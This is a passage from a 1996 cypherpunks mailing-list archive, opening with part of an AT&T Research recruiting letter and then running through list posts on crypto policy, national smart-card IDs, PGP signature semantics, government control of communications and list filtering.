for everyone in the United States. This department can offer a new
public-oriented mission. The enclosures briefly describe some sample
projects.

In spite of, or perhaps because of the recent breakup, the company is
continuing to invest in research. About 300 technical staff from the old
Bell Labs, mostly computer scientists, are part of the new AT&T Research
organization. Research areas include databases, programming languages,
software engineering, speech, cryptography and security, human factors,
collaborative applications, and more. Many departments will be hiring.

Like the former Bell Labs, the work environment is informal but intense
and intellectually rigorous.  External publication is encouraged. We
measure success by leadership and impact, in the academic research
community, in AT&T's business, and in the world.  

Please feel free to send us suggestions or pass this letter on to anyone
you think may be interested. In addition to permanent positions, there
are also opportunities for sabbaticals, post-docs, and summer
employment.

Thanks in advance for any assistance you can provide.

Sincerely,


Paul Resnick	
Member of Technical Staff
Public Policy Research Department	
presnick@research.att.com

Eric Sumner
Director, 
Network Services Research Laboratory
ees@research.att.com

P.S. You may also receive this message by paper mail: we're trying to make
it as easy as possible for you to pass it along to people who might be
interested.

-----------------------------------

Public Policy Research Department

The department creates rules and tools that enhance the common wealth in
electronic markets and other virtual public spaces where people may
interact with others they do not know very well. Traditionally,
enhancing the common wealth has been the government's purview, but
advanced communication services offer new opportunities for governance
without government. Areas of interest include:

  privacy, security, anonymity, freedom and responsibility in cyberspace
  rating and reputation services
  intellectual property
  universal service
  electronic markets
  pricing and provision of public goods
  trust and other forms of social capital

Sample Projects

PICS: The Platform for Internet Content Selection

With its recent explosive growth, the Internet now faces a problem that
confronts all media that serve diverse audiences: not all materials are
appropriate for every audience. For each new medium, society has had to
balance the value of free speech against the social costs of
distributing materials to inappropriate audiences. While most media are
regulated by blanket rules, on the Internet it is possible to reconcile
those goals through individual choices in a marketplace of ideas. In
other words, the Internet can regulate itself.

PICS, the Platform for Internet Content Selection, is designed to enable
supervisors-- whether parents, teachers, or administrators-- to block
access from their sites to certain Internet resources, without censoring
what is distributed to other sites. It draws on two unique features of
the Internet. First, publishing is instantaneous, world-wide, and very
inexpensive, so it is easy to publish rating and advisory labels. Labels
and ratings already help consumers choose many products, from movies to
cars to computers. Such labels are provided by the producers or by
independent third parties, such as consumer magazines. Similarly, labels
for Internet resources could help users to select interesting,
high-quality materials and could help supervisors to block access to
inappropriate ones.  Second, access to Internet resources is mediated by
computers that can process far more labels than any person could. Thus,
parents, teachers, and other supervisors need only configure software to
selectively block access to resources based on the rating labels; they
need not personally read them.

This project is a consortium of 23 companies, under the auspices of
MIT's World Wide Web Consortium. It has received significant attention
in the press as an alternative to government-mandated blanket rules that
would restrict the distribution of indecent materials. Details can be
found at http://www.w3.org/PICS.

Markets for IP Addresses

The 32-bit numbers used for Internet addressing and routing are a
limited resource. As this resource becomes scarcer, political
considerations are likely to creep into allocation decisions made
through existing administrative processes, leading to suboptimal
allocations. By granting transferable property rights to addresses,
allocation decisions can be removed from the political realm into the
economic realm, so that addresses are allocated to those who value them
most. This project seeks to develop consensus in the Internet community
for a move to market-based allocation, and investigates alternative
designs for an electronic market to coordinate the exchange of IP
addresses.

Electronic Support for Entry-Level Labor Markets

Entry-level labor markets in several professional fields, including law,
medicine, and psychology, share the characteristic that a large cohort
of new employees are available at approximately the same starting date
each year. The hiring processes in these fields,however, differ
significantly. Medical residents "match" with hospitals through a
centralized process embedded in a computer algorithm. Law students are
hired in a far more decentralized process. This project explores whether
computer mediation of the process can combine the advantages of both the
centralized and decentralized approaches.

Reputation Services

In the physical world, trust and reputations play critical roles in
commercial and social interactions. If word travels fast in a community,
the consequences of unethical or antisocial behavior may be sufficient
to deter such behavior. Moreover, there is an incentive to engage in
good behavior, because it will be recognized and rewarded. In on-line
environments with a dispersed base of casual users, word may not get
around so fast. Reputation services will help spread the word: they can
automatically keep track of good and bad behavior and make that history
available in useful ways. Since it is easy to assume new identities and
start new businesses on-line, leaving old reputations behind, positive
reputations are likely to be far more important than negative ones.


------------------------------------------------------------
Paul Resnick			AT&T Research
Public Policy Research		Room 2C-430B
908-582-5370 (voice)		600 Mountain Avenue
908-582-4113 (fax)		P.O. Box 636
				Murray Hill, NJ 07974-0636




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Tue, 13 Feb 1996 16:37:13 +0800
To: PADGETT@hobbes.orl.mmc.com
Subject: Re:
In-Reply-To: <960212134104.2021ab25@hobbes.orl.mmc.com>
Message-ID: <312026a9.495564@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996 13:41:04 -0500 (EST), Padgett wrote:

> If it were properly and legally decided that communications 
> with anon.penet.fi is against "national interest" then the sovereign has 
> not only the "right" but the *duty* to block/monitor such communications.

Bullpuckey.  One could just as legitimately say:

  "If it were properly and legally decided that publication of the
  Los Angeles Times is against "national interest" then the sovereign
  has not only the "right" but the *duty* to block such publication."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnsonr@hoshi.colorado.edu (Richard Johnson)
Date: Tue, 13 Feb 1996 22:11:29 +0800
To: cypherpunks@toad.com
Subject: Pointer to pro-"compromise" analysis of Japanese Crypto Policy
Message-ID: <v02140b00ad463de68e4c@[204.144.184.50]>
MIME-Version: 1.0
Content-Type: text/plain


Japanese encryption policy evidently has no room yet for key "compromise"
by the Japanese government.  However, Mr. Baker holds out hope that that
may change.

Forwarded-by: bostic@bsdi.com (Keith Bostic)
Forwarded-by: Phil Agre <pagre@weber.ucsd.edu>

EMERGING JAPANESE ENCRYPTION POLICY
        by Stewart A. Baker
           Steptoe & Johnson
           sbaker@steptoe.com

http://www.us.net/~steptoe/276915.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Feb 1996 19:45:09 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <2.2.32.19960213112518.0082d1c8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:57 PM 2/12/96 +0000, Deranged Mutant wrote:

>"The word to kill ain't dirty
> I used it in the last line
> but use a short word for lovin'
> and you wind up doin' time..."

But has anyone done time yet (recently) for "indecency."  I don't think so.
The radio stations were fined and/or threatened with license pulling but no
one was put in stir.  And since net access is not licensed, there's nothing
to pull.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 13 Feb 1996 22:08:39 +0800
To: cypherpunks@toad.com
Subject: More DaveMail: New Date: 2/22/96
Message-ID: <v02120d07ad463d044fb9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Mime-Version: 1.0
Date: Mon, 12 Feb 1996 17:27:12 -0800
To: telstar@wired.com (Todd Lappin -- Wired), davenetworld@wired.com,
        eric.alderman@hmg.com, shabbir@vtw.org (Shabbir J. Safdar),
        sac88867@saclink1.csus.edu (Allen Cole),
        nagel@applelink.apple.com (Dave Nagel -- Apple),
        apj7@columbia.edu (Andrew Johnston), strindberg3@applelink.apple.com,
        robg@prognet.com (Rob Glaser -- Progressive Networks),
        esp@montreal.com (David Kramer),
        ebelove@staff.ichange.com (Ed Belove -- AT&T Interchange)
From: dwiner@well.com (DaveNet email)
Subject: New Date: 2/22/96
Sender: owner-davenetworld@wired.com
Precedence: bulk

---------------------------------------
Amusing Rants from Dave Winer's Desktop
Released on 2/12/96; 5:18:26 PM PST
---------------------------------------

  Rob Glaser, robg@prognet.com, was the first to question the choice
  of 2/12/96 for the 24 Hours of Democracy project.

  He said: "I think this is a very good idea overall. But I think it is
  unnecessarily (insanely?) ambitious to try to pull it off on
  Wednesday."

  Many more emails like that followed.

  As the day progressed, I realized that while I'm itching to get the
  ball rolling, it's taking longer than I thought it would for the
  pieces to come together.

  So we're pushing the date back.

  ***February 22, 1996

  The start time will be: 12:01AM, Pacific, 2/22/96.

  The end time will be: 11:59PM, Pacific, 2/22/96.

  February 22 is George Washington's Birthday. A national holiday in
  the United States. It's a bank holiday. The post office is closed.

  We celebrate the birth of our founding father. The leader in our war
  for independence. He was the first president of the United States.
  The man who, according to legend, could not tell a lie.

  So -- instead of writing a love letter to the Internet, tell the truth
  about democracy. The founding principles of the United States. The
  Declaration of Independence. The Constitution. The Bill of Rights.

  How would George Washington feel about the Internet?

  And even though 2/22/96 is not Valentine's Day, if you want to write a
  love letter to the Internet, that's probably OK too!

  Stay tuned to <http://www.hotwired.com/userland/24/> for news on
  sponsorship, press information, free web posting via email, clip
  art, and information about how you can contribute to the success of 24
  Hours of Democracy.

  Thanks!

  Dave Winer

  PS: Remember Abraham Lincoln, whose birthday is today, and remember
  slavery, the Civil War, and then freedom. Can it happen here? It did!

-----------------------------------------------
2/22/96: <http://www.hotwired.com/userland/24/>

--- end forwarded text


--------------------------------------------------
The e$ lists are brought to you by:

Making Commerce Convenient (tm) - Oki Advanced Products - Marlboro, MA
Value-Checker(tm) smart card reader= http://www.oki.com/products/vc.html

Where people, networks and money come together: Consult Hyperion
http://www.hyperion.co.uk                    info@hyperion.co.uk

See your name here. Be a charter sponsor for e$pam, e$, and Ne$ws!
See http://thumper.vmeng.com/pub/rah/ or e-mail rah@shipwright.com
for details...
-------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 14 Feb 1996 02:17:00 +0800
To: cypherpunks@toad.com
Subject: Firewall USA to Firewall China
Message-ID: <960213083000.2021706c@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>Q: The Chinese government has declared its intention to filter out
>  what it considers to be objectionable material from the Internet. If
>  you were a consultant for the Chinese government, what technology
>  would you recommend that they use to do that?

Multiple layers would probably do it:

1) Acces only to/from sites with which they have a formal agreement
2) Using secure channels
3) With good application filters (could be created - that I do not know
   of anyone who has is irrevelant - MIMEsweeper is a start.)

Mostly it depends on how seriously they want to block certain kinds of
traffic and what of the I'net's capabilities they are willing to give up
to achieve that goal.

Now before I get flamed again, please understand that I separate what *can*
be done from what *should* be done. This is a "can" and is also considering
the fact that a sovereign nation has the *right* to do this unless it gives
up that right. A US company also has that right where it pertains to their
property unless again they give up that right (see: common carrier).

					Warmly,
						Padgett

ps wife informed me that when traffic backs up, it is ok to leave a hole for
   cross traffic to use but if you make any sort of gesture to indicate that
   is what you have done, *you* become liable for the cross traffic's actions.
   Absurd, no ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdoe-agamemnon@alpha.c2.org
Date: Wed, 14 Feb 1996 07:12:34 +0800
To: cypherpunks@toad.com
Subject: Give it a rest Perry
Message-ID: <199602131633.IAA13161@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Cpunks,

On Mon, 12 Feb 1996 Ray Arachelian wrote:

>I personally like reviews of messages that are posted regarding other 
>people's posts, however I prefer to read them in email.  Cypherpunks 
>isn't for "this doesn't belong here" messages. :)

I personally agree with him.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 14 Feb 1996 01:59:53 +0800
To: cypherpunks@toad.com
Subject: Smart cards
Message-ID: <960213091516.2021706c@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


   
>   The largest demand, though, will come from government agencies, like
>   Spain's Social Security Administration and the Czech Republic's
>   Healthcare Ministry. China, with a population of 1.2 billion, is
>   considering a national identification card using this technology, said
>   Waqar Qureshi, Motorola worldwide marketing manager for smart-card
>   chips.
 
Been around for quite a while - expensive part is not the cards themselves
($1-$3) but the card *readers*.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 14 Feb 1996 09:13:09 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602131752.JAA28288@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:36 AM 2/13/96 -0800, jim bell wrote:
>
>You mention the issue of Rushdie, as if it is some sort of refutation of my 
>idea.   Quite the contrary; I think it actually supports me.
>
>How so?, you ask?  Well, let's consider any potential assassin who might be 
>interested in this "contract."  Aside from the obvious moral issues involved 
>here (Rushdie has, presumably, done nothing to warrant his death), the truth 
>is that such a potential assassin would see a number of problems that would 
>strongly dissuade him from attempting to kill Rushdie.
>
>1.  There is no way he could be assured that he could collect the award 
>anonymously.  His name would certainly "get out," and then he would be 
>subject not merely to "the law," but also anybody who wanted revenge for 
>Rushdie's death.
>
>2.   There is no way he could be assured that he would actually receive the 
>award.  (How would he prove HE did it?)
>
>3.  That's because there is no way he would enforce this "contract" should 
>the offerer refuse to pay.

These points would not affect a devout Iranian Muslem.  To him the death
warent has already been issued by legitimate authority.  It is not even
clear that money would be his princple motivator.

I must respectifully disagree with Jim in this case.  I believe that
Rushdie has not been hit because the protection he enjoys is sufficent to
repel the potential assassins.  Note that he has an advantage over the US
president (who probably has as many potential assassins) in that he does
not need to make public appearences.

Adding money to the pot will attract rational (and amoral) people who will
then make a determination based on (1) profit, and (2) risk, which includes
getting caught or killed.  It seems to me that Secret Service levels of
protection can protect a public figure against even Assassination Politics.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Wed, 14 Feb 1996 04:23:34 +0800
To: cypherpunks@toad.com
Subject: Communication
Message-ID: <960213100636.2021706c@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim rites:
>Logic lesson for Padgett:
>There are at least three categories here:
>1.  Government restricts communication.
>2.  Government neither assists nor restricts communication.
>3.  Government assists communication.  (through stolen tax dollars, BTW.)

Oh, now I see where you are confused. To me there are at least six
categories - the three you mention but in matrix form with two
columns: Wholly inside the USA and from the USA to/from "elsewhere".

(2) applies inside the USA and in some cases (3) - and tax dollars are not
necessarily "stolen", the Constitution specifies that taxes may be levied for
certain matters. (1) does not apply though through the rationale/excuse of
"maximising the use for all" some regulations have been enacted primarily
by the FCC. It is not improbable that the FCC's area of responsibility might
extend to the Internet once considered a "national resource". Not saying
right or wrong, just "could" & would not be surprised.

In the case of communications with "other" entities, I expect all three to
apply in different instances - what makes anon.penet.fi different from the
L. A. Times.

Now in the case of extra-National communications, I believe that in certain
cases the Nation-state has not only the sovereign right of control but the 
obligation to control. For example just to pick a popular example, France 
might negotiate a trade agreement with the USA that included an agreement to 
block all PGP communications between the two countries. That would be legal.

What the US does not really have is the *ability* to control communications.

							Warmly,
								Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 14 Feb 1996 10:27:17 +0800
To: cypherpunks@toad.com
Subject: NETSCAPE IS "IN MERGER TALKS WITH AMERICA ONLINE"
Message-ID: <199602131839.KAA02998@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


PowerPC News (free by mailing add@aptdata.co.uk) quotes Reuter as as saying
that Thomas Middelhoff, a board member of Bertelsmann AG, which has a
significant stake in America  Online, said that a decision on the merger
could be made within a month. He noted that new data showed that 40% of US
Internet traffic was flowing through America OnLine's network and that
together with Netscape the two companies would effectively  control the
technology now shaping the global network - "And then Microsoft would be
left without an Internet standard,".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Wed, 14 Feb 1996 06:36:20 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: Re: Smart cards
In-Reply-To: <960213091516.2021706c@hobbes.orl.mmc.com>
Message-ID: <Pine.OSF.3.91.960213102814.28280A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



	The headline in the Toronto Star this morning is "'SMART CARD'
HERE WITHIN YEAR" 
	The idea is to have everyone in Ontario have a 'smart card' that
will "keep track of everything from mammograms to speeding tickets". This
card will "replace the existing health card, drivers's licence, social
assistance identification, drug card, and senior identification". 
	Health Minister Jim Wilson said " For example, when you are 
discharged from hospital, your patient record doesn't follow you (so) you 
may go to your family doctor back in your hometown and have all the tests 
and x-rays duplicated." "That sort of information can be available in a 
central database. Of course we have to have all the discussions about 
privacy of information." (I'll just bet we do!)
	"Former Health Minister Ruth Grier also explored a smart card, but
rejected the idea because she said it posed too great a risk to patient
privacy. Wilson said privacy protection will be a key part of the new 
card, ensuring that only appropriate health-care workers and OHIP 
(Ontario Health Insurance Plan) officials can access sensitive patient 
information."
	"The card would carry basic 'tombstone data' such as date of 
birth and gender that Wilson said is now collected by 200 different 
government programs."
	"Wilson said the government has not decided whether the cards will
carry a residents's fingerprints, photo or other form of identification." 

	It seems that Canada is backing into a national identity card
using 'smart' technology. Before any Americans on this list get too smug
about 'it could never happen in America', just remember, all it takes is a
successful example of implementation in a western country and the pressure
will come to your country too. 

Sign me concerned,
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 14 Feb 1996 09:22:14 +0800
To: Jiri Baum <jiri@baum.com.au>
Subject: An entity calling itself Kilroy was probably here (was: Web Page Authentication (was: Anti-Nazi Authentication) )
In-Reply-To: <199602131244.XAA00168@mail.mel.aone.net.au>
Message-ID: <199602131752.KAA12867@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

This quotes some mail sent directly to me by (probably) an 
entity calling itself "Jiri Baum".  I apologize in advance
if said probable entity is offended at my broadcasting his
words, but I thought it was a good contribution to cpunks.
(Which, cosmos knows, could use some good contributions
that aren't just rehashes of the eternal floating
"libertarianism" Usenet flamewar/rantfest.)


(Hereafter knowns as "the EFLUFR", pronounced "Effluffer".)


  +---+---- Bryce
  |   |
+---+------ Probably an entity calling itself Jiri
| | | |
v v v v
> > > > An entity calling itself Jiri Baum 
> > > > <jirib@sweeney.cs.monash.edu.au> probably wrote:
> > > ...
> > > 
> > > Probably? Didn't I sign it? :-)
> >
> >
> >Ah, grasshopper...  If there was a good path between you and
> >I in the Web of Trust, *then* I would take out the
> >"probably".  :-)
> ...
> 
> I guess it depends on whether we are talking about "Jiri Baum wrote"
> (about which you'd be perfectly right) or "An entity calling itself
> Jiri Baum wrote". Witness:
>   + there exists an entity which controls the PGP key in question
> (*)
>   + that entity calls itself "Jiri Baum" (key signature)
>   + that entity wrote the text in question (text signature)
> 
> Therefore, an entity calling itself Jiri Baum wrote the text in
> question. No need for a web of trust - as they say on Star Trek,
> simple logic will suffice :-)


Well now let's say that an active attacker had supplanted
your public key with his own.  He is not, really, an entity
who calls himself "Jiri".  I mean, sure by using a public 
key which he controls and which has "Jiri" on it he is 
calling himself "Jiri", but he rarely if ever actually talks
to people and says things which those people associate with 
the name "Jiri".  More significantly, he never thinks of
*himself* as "Jiri".  So in this most fundamental sense he
does not "call himself Jiri".


*You* are the entity who calls yourself Jiri, and I can only
say that you "probably" wrote the above because I'm not sure
if you actually control the public key associated with your 
name.


Tim May's solipsistic conflation of appearance and identity
notwithstanding.


I guess we are just using different semantics for "an entity
calling itself".  I didn't want to say "an entity whose One
True Name is 'Jiri Baum'", because I don't believe in One
True Names.  I can see how my choice of words was confusing
though, since Mitch (the Man In The CHannel) can be seen as
"calling itself 'Jiri Baum'".


Maybe I'll start saying "An entity who creates the output
which we associate with the nym 'Jiri Baum'...", in order to
point out that the actual "Jiri" makes this stuff up and 
Mitch just relays it with perhaps some editing.  But then
what if Mitch took a more active role, putting words in your
mouth and so forth?  Maybe I should say "An entity who calls
itself 'Jiri Baum' and is more or less unaware of any nym
collision regarding that nym...".


Yeah, that one seems bulletproof...



> True - I guess that's another use - a time-stamping service could
> sign any page that asks for it. Time to whip up yet another CGI
> script! (When/if I have the time - this one ain't so simple because
> it has to get the page off the web.)


Wei Dai <weidai@eskimo.com> and Matthew Richardson 
<matthew@itconsult.co.uk> have both done this.  I suspect
that Wei's time-stamping service is not still functional.
(A pity.  We need redundancy for added assurance.)


I myself use Usenet and mailing lists as a sort of poor
man's time-stamping service.  If I invent an idea or some
prose, and I sign it and then broadcast it thusly, I think
enough people will keep a record of it having been in
existence with my signature on it at this time, that I can
later call on them to testify to that effect.  Hopefully.


Yet another reason to clearsign my output.


Okay I will try to find responses to this even if they are
buried in the EFLUFR.  (All hail GREP!)


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMSDPpPWZSllhfG25AQFrUgP+IzidvICvkApSl87b03f4Ebatwcmg05cJ
QF3jE7SbmRpcJshE6Cty5Lu3revBeGknRI3VDMoS4n0fCIxjq3D592d5mqOjwN0e
QV620Aq2cnJZ3LRknZtaIGNluedkC4iG2xM3VzxIbVVGmmGEbhwEhKNmFEqWr2um
SdDPSWvtnhs=
=sc0s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: privsoft@ix.netcom.com (Steve )
Date: Wed, 14 Feb 1996 11:16:28 +0800
To: cypherpunks@toad.com
Subject: DSN Tech.
Message-ID: <199602131852.KAA20485@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Is anyone famillar with the balck-box by Dr. Aaron Freidman of DSN 
Technologies? I am trying to get info on it and other products from DSN 
Tech. 
thnx
privsoft@ix.netcom.com
Steve

"The CDA Sucks!" 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 14 Feb 1996 08:21:35 +0800
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Subject: Re: Communication
In-Reply-To: <960213100636.2021706c@hobbes.orl.mmc.com>
Message-ID: <199602131605.LAA22213@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


A. Padgett Peterson P.E. Information Security writes:

> Now in the case of extra-National communications, I believe that in certain
> cases the Nation-state has not only the sovereign right of control but the 
> obligation to control. For example just to pick a popular example, France 
> might negotiate a trade agreement with the USA that included an agreement to 
> block all PGP communications between the two countries. That would be legal.

Padgett, you can't just throw out these pronouncements without supporting 
arguments.  Why would this be legal?  Merely because you say so?
Where would the US government get the authority to prohibit all PGP
communications?  If you still insist this is allowed by the "regulate
foreign commerce" clause of the US Constitution, you at least need
to describe how the USG would attempt to justify it to a court as
commerce.  Furthermore, since the foreign commerce clause is also the
inter-state commerce clause, explain why the government can't use the
same argument to prohibit us folks in Georgia from using PGP in our
communications with Californians (for example).  Or do you believe it can?


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 14 Feb 1996 09:36:31 +0800
To: cypherpunks@toad.com
Subject: TEN_ysp
Message-ID: <199602131607.LAA08878@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   2-13-96. NYT:

   "New Spynet Links C.I.A. and Envoys."

      The C.I.A. is planning to buy commercial comm gear, put
      an encrypting scrambler on it, and give diplomats in
      Bosnia and elsewhere the ability to receive adulterated
      facts that it previously had been unwilling or unable to
      share except with enemies. Soon, diplomats will be up to
      speed with spying foreign correspondents, many of
      whom have portable comm gear combining sat phones and
      computer ports. "We have our own classified Internet in
      the intelligence community, with home pages just like
      you do on the Internet," gurgled a spy-leaker to this
      reporter-siphon -- who already knew by spying browsers
      and snooping search engines what the dagger-gagger
      duhhed.

   TEN_ysp












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 14 Feb 1996 21:36:21 +0800
To: cypherpunks@toad.com
Subject: Pointer to pro-\"compromise\" analysis of Japanese Crypto Policy
Message-ID: <199602131703.MAA27340@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by johnsonr@hoshi.colorado.edu (Richard 
Johnson) on Tue, 13 Feb  6:17 AM

>EMERGING JAPANESE ENCRYPTION POLICY
>        by Stewart A. Baker



For a less NSA-taxidermic and a more cypherpunkish take on 
Japanese crypto try the effervescent work of B.U.G. -- Bright 
Uncanny Guys -- at:


     http://www.fix.co.jp/BUG/news.html


BUG has also just announced a new RSA-bred authentication 
service, sez a cypherpunk ninja.


Who also reports a Japanese smiley as: (^^)


And a thank you as: o


o


(^^)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Wed, 14 Feb 1996 22:07:45 +0800
To: cypherpunks@toad.com
Subject: Re: More DaveMail: New Date: 2/22/96
Message-ID: <9602131710.AA23378@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:12 AM 2/13/96 -0500, Robert Hettinga wrote:
>
>  ***February 22, 1996
>
>  The start time will be: 12:01AM, Pacific, 2/22/96.
>
>  The end time will be: 11:59PM, Pacific, 2/22/96.
>
>  February 22 is George Washington's Birthday. A national holiday in
>  the United States. It's a bank holiday. The post office is closed.


    Although I missed the beginning of this thread, FYI, the holiday will be
celebrated on Monday, February 19, 1996, i.e., the day when it will be a
national holiday, and the banks and post office will be closed.


Regards -
Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 14 Feb 1996 22:08:31 +0800
To: Leslie Todd Masco <cactus@hks.net>
Subject: Re: META: Filtering/Posting advice
In-Reply-To: <199602122243.RAA22214@bb.hks.net>
Message-ID: <Pine.SUN.3.91.960213120407.18735B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Leslie Todd Masco wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> "I have a concern..."
> 
> Cypherunks 
> First: Stipulated that any traffic has a 'right' to be on cypherpunks.
> However, cypherpunks is what we make it.  Every time you post a message,
> consider the desirability of seeing a hundred or so messages just
> like it from every other readers' point of view.  Content control begins at home.
> 
> Second: I'll remind the reader that one can easily evaluate an
> individual's past contributions to cypherpunks by looking at the archives'
> "by author" listing.  If you post to cypherpunks, I'd suggest that you
> go back and look at what you've posted in the past to get a feel for
> how other people on the list see you.

There are options for those that don't want to read the noise.  I do run 
a free filtering service, it's certainly not the best in the world, but 
it's available for free and all who want it.  There are two more that I 
know of, one for free the other for pay.

I'd like to filter the stuff I send according to topics, but I haven't 
yet written the tools to do so.  As it is most of my subscribers are 
happy with the crappy service I provide, much happier than having the 
whole list delivered to them.

Personally, I am interested in reading the whole list because even some 
of the noisy messages are worth reading (except for Perry's "This don't 
belong here" and *PLONK*'s. :)

So there are options for those who want less noise.  I do not beleive it 
is anyone's place to banish anyone from posting to the list, nor grading 
a person's worth based on past posts.  Remember that the cypherpunks list 
is after all headless and should remain that way.  The whole point is to 
have an anarchic, leaderless, moderatorless list.

Now some Cpunx do have reputations for being on the ball.  Tim and Hal 
being two such punx.  That doesn't make them moderators, nor does it make 
them the only voices worth listening to, nor does it make them infallible 
or on-topic all the time either.

Yet were to to instill a fascist moderated list, their voices would be 
squelched by definition of what doesn't fit.  Not a cool thing IMNSHO.

Certainly there are cross overs ranging from news bites to Mitnik to 
conspiracy-paranoia-punks, etc.  I don't mind reading some of the shit to 
get to the good bits.  You never know, even the shit messages have some 
worth in the long run.

"If you filter, filter it yourself for yourself" is what I agree with.  
Now some folks think that the stuff I filter for them is exactly or close 
to what they want or better than having to do it themselves.  Fine by me, 
I'm happy to filter stuff for them.  As much as I'd like Perry to cut the 
shit and write code instead of spamming the spammers, I'd rather have to 
put up with the shit than to put up with restrictions on the list.

Just my e$0.02. :)

[Shameless plug: to subscribe to my list, send a >PRIVATE reply, don't 
reply such that the message will reach cypherpunks@toad.com with the 
subject being either "FCPUNX HELP" or "FCPUNX SUBSCRIBE" and no quotes...

The 'bots that subscribe folks will refuse any subscription attemts that 
come via the actual cypherpunks list. :]

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 14 Feb 1996 08:51:23 +0800
To: "Mark Allyn (206) 860-9454" <allyn@allyn.com>
